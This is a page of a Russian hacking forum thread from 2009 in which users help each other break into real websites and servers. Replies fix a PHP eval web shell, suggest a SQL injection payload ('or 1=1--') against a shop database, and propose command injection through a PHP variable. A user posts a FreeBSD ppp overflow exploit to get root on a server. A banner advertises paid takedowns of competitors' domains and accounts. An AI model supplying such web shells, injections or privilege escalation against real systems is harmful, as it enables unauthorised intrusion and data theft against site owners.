Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 877 из 2422

877

Опции темы

Поиск в этой теме

Опции просмотра

08.09.2009, 08:30

BlackSun

Познавший АНТИЧАТ

Регистрация: 01.04.2007

Сообщений: 1,268

С нами: 10058786

Репутация: 4589

Цитата:

Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
и исходном коде <?eval($_GET[e]);?>

Пробел нужен, <?php eval($_GET[e]); ?>

𝕏 Twitter Reddit Telegram Копировать ссылку

08.09.2009, 14:46

paypoker

Новичок

Регистрация: 03.08.2009

Сообщений: 7

С нами: 8827380

Репутация: 0

помогите с инекцией как сделать правильный запрос
SELECT SQL_CALC_FOUND_ROWS DISTINCT i.id, i.dimensions, i.prweight, i.prtype, i.processor, i.slots2 as slots, i.cards2 as cards, i.os2 as os, i.memory2 as memory, i.description2 as description, i.display2 as display, i.resolution2 as resolution, i.battery2 as battery, i.communication2 as communication, i.other2 as other, i.control2 as control, i.handcr2 as handcr, i.adddevice2 as adddevice, i.contents2 as contents, i.apps2 as apps, i.price, i.pricepromo, i.text2 as text, date_format(i.addtime,'%d/%m/%Y') as litaddtime, if(i.instock = 1,'instock','notinstock') as state, if(i.title2 <>'', i.title2,i.title2) as title, if(c.title2 <>'',c.title2,c.title2) as category, br.title as brand, br.onhp as otherbr, ifnull(im1.image,im.image) as image, im.firstimage, if(i.category_id in(1,3),1,0) as pdas, i.brand_id, i.category_id, i.status FROM items as i left join brands as br on i.brand_id = br.id left join categories as c on i.category_id = c.id left join images as im on im.item_id = i.id left join images as im1 on im1.item_id = i.id and im1.firstimage = 1 WHERE i.active=1 AND i.status ='Active' GROUP BY i.id HAVING 1=1 AND ( id='a'' OR title like '%a'%' or description like '%a'%' or communication like '%a'%' or other like '%a'%' or contents like '%a'%' or apps like 'a'' or memory like '%a'%' or display like '%a'%' or category like '%a'%' or brand like '%a'%' or processor like '%a'%' or text like 'a'' ) LIMIT 0, 4

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or description like '%a'%' or communication like '%a'%' or other like '%a'' at line 54
параметр передается везде где сейчас a'

08.09.2009, 14:57

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

С нами: 9361870

Репутация: 58

2paypoker
%a'%
id='a''
лишная кавычка) попробуй инжектить

Цитата:

a') or 1=1+--+

09.09.2009, 12:12

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

С нами: 9328846

Репутация: 270

Вопрос такой,можно ли в тиблицах джумлы последних версий,найти урл самого сайта где она стоит,раньше дампил контент и искал по гуглу,а тут контент дефолтный.
спасибо

Последний раз редактировалось Shadrin; 09.09.2009 в 12:22..

09.09.2009, 17:33

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

С нами: 9567480

Репутация: 61

Что делать если .NET (MSSQL) режет слова, а точнее говорит что это еррор
пробовал в скобки заключать и делать типо %64%40

PHP код:


		
			
&#51460; 76:             {

&#51460; 77:                 DsCom.CommandText = szQuery;

&#51460; 78:                 this.dr = DsCom.ExecuteReader();

&#51460; 79:                 m_nRowCount = 0;

&#51460; 80:             }

PHP код:


		
			
[SqlException (0x80131904): &#53412;워드 'or' 근처의 구문이 잘못되었습니다.]

   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +1950890

   System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +4846875

   System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194

   System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392

   System.Data.SqlClient.SqlDataReader.ConsumeMetaData() +33

   System.Data.SqlClient.SqlDataReader.get_MetaData() +83

   System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +297

   System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) +954

   System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) +162

   System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +32

   System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +141

   System.Data.SqlClient.SqlCommand.ExecuteReader() +89

   MinWeb.Lib.DBManager.SetDataReader(String szQuery) in d:\WebData\test.com_www\App_Code\MinWebLib_DBManager.cs:78

   Community_Screenshot_View.Page_Load(Object sender, EventArgs e) in d:\WebData\test.com_www\Community\Screenshot\View.aspx.cs:62

   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14

   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35

   System.Web.UI.Control.OnLoad(EventArgs e) +99

   System.Web.UI.Control.LoadRecursive() +50

   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627

09.09.2009, 19:33

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

С нами: 9347610

Репутация: 165

Здраствуйте.
Хочу поднять прова root на сервере ОС
FreeBSD 6.3-RELEASE-p5
Сам эксплоит:

Код:

/***********************************************************************************/

/***     pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/

/***     2003 / 12 /23   - PRIVATE CODE                                          ***/

/***     Program terminated with signal 11, Segmentation fault.                  ***/

/***     #0  0xbeefdead in ?? ()                                                 ***/

/***********************************************************************************/


I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)


Steps to reproduce:


1. Run ppp

2. type the following (or atleat some variation of)

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxx


This will produce a segmentation violation (Core dumped).


Discovered by: sipher


Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet

Обьясните пожалуйсто что такое "user-ppp" и как его запустить?

09.09.2009, 21:15

z00MAN

Постоянный

Регистрация: 20.11.2008

Сообщений: 406

С нами: 9196401

Репутация: 930

Цитата:

Сообщение от SeNaP

Здраствуйте.
Обьясните пожалуйсто что такое "user-ppp" и как его запустить?

ppp это модемный сервис в фряхе.

user PPP - это PPP уровня пользователя

Последний раз редактировалось z00MAN; 09.09.2009 в 21:20..

10.09.2009, 00:38

2pick

Познающий

Регистрация: 17.03.2007

Сообщений: 98

С нами: 10080415

Репутация: 45

Столкнулся со следующей ситуацией:

PHP код:


		
			
$pageList = array();

$fileList = array();



     $pageList[1] = 'Contact Information';

     $pageList[2] = 'Event Information';

     $pageList[3] = 'Payment Information';

     $pageList[4] = 'Submit';



     $fileList[1] = 'ContactBP';

     $fileList[2] = 'Events';

     $fileList[3] = 'Payment';

     $fileList[4] = 'Success';



  $file = $fileList[$pageNo];



 eval( "{$file}Page::createPage(" . '$pageNo, $pageList, $theme, $fileList );' );

К $pageNO доступ извне есть, но:
1. отсекается $file = $fileList[$pageNo]
2.так же сильно обламывает $fileList = array()

Подскажите, есть ли способ какой-то обойти оба способа "защиты"?

10.09.2009, 06:39

BlackSun

Познавший АНТИЧАТ

Регистрация: 01.04.2007

Сообщений: 1,268

С нами: 10058786

Репутация: 4589

Цитата:

Подскажите, есть ли способ какой-то обойти оба способа "защиты"?

нет.

#10

10.09.2009, 10:16

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

С нами: 10254549

Репутация: 227

если Регистр_глобалз=ОН, то
попробуй передать код через переменную
$theme.
примерно такого плата:
; system('ls');/*

Страница 877 из 2422

877

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57